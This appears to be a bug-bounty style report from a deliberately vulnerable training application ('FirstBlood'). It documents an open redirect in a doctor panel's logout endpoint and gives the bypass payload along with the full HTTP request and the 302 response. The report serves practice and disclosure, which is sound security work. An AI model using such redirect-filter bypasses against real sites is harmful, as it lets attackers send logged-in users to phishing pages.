FirstBlood-#41 — Open URL Redirect on /drpanel/logout.php
This issue was discovered on FirstBlood v1.0.0
On 2021-05-09, rintox Level 3 reported:
There's an Open URL Redirect vulnerability in the logout functionality. If a malicious actor sends the link to the logged in doctor, the application will redirect the doctor to a malicious site.
Steps to Reproduce
- As a logged in Doctor, click on the securely sign out button.
- Notice the endpoint has a ref variable.
- If you submit the following payload, the application will redirect the user to the url provided by the payload:
GET /drpanel/logout.php?ref=//https:\/\/www.google.com HTTP/1.1 Host: firstbloodhackers.com:49250 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://firstbloodhackers.com:49250/drpanel/index.php Cookie: drps=5d7d4cc8df1274aac3ef42507 Upgrade-Insecure-Requests: 1
HTTP/1.1 302 Found Server: nginx Date: Sun, 09 May 2021 16:44:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Location: https://www.google.com Content-Length: 0
As you can notice, the location header has the google.com url in it, which will take the user to that url.
Since the application does not has a mechanism to validate that the logged in user wants to log out, if the Doctor visits the URL provided by the attacker, it will redirect him/her to the malicious site.
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open url redirect vulnerability on /logout.php. The code expects it to start with / and does not allow to redirect to external domains but this can be bypassed.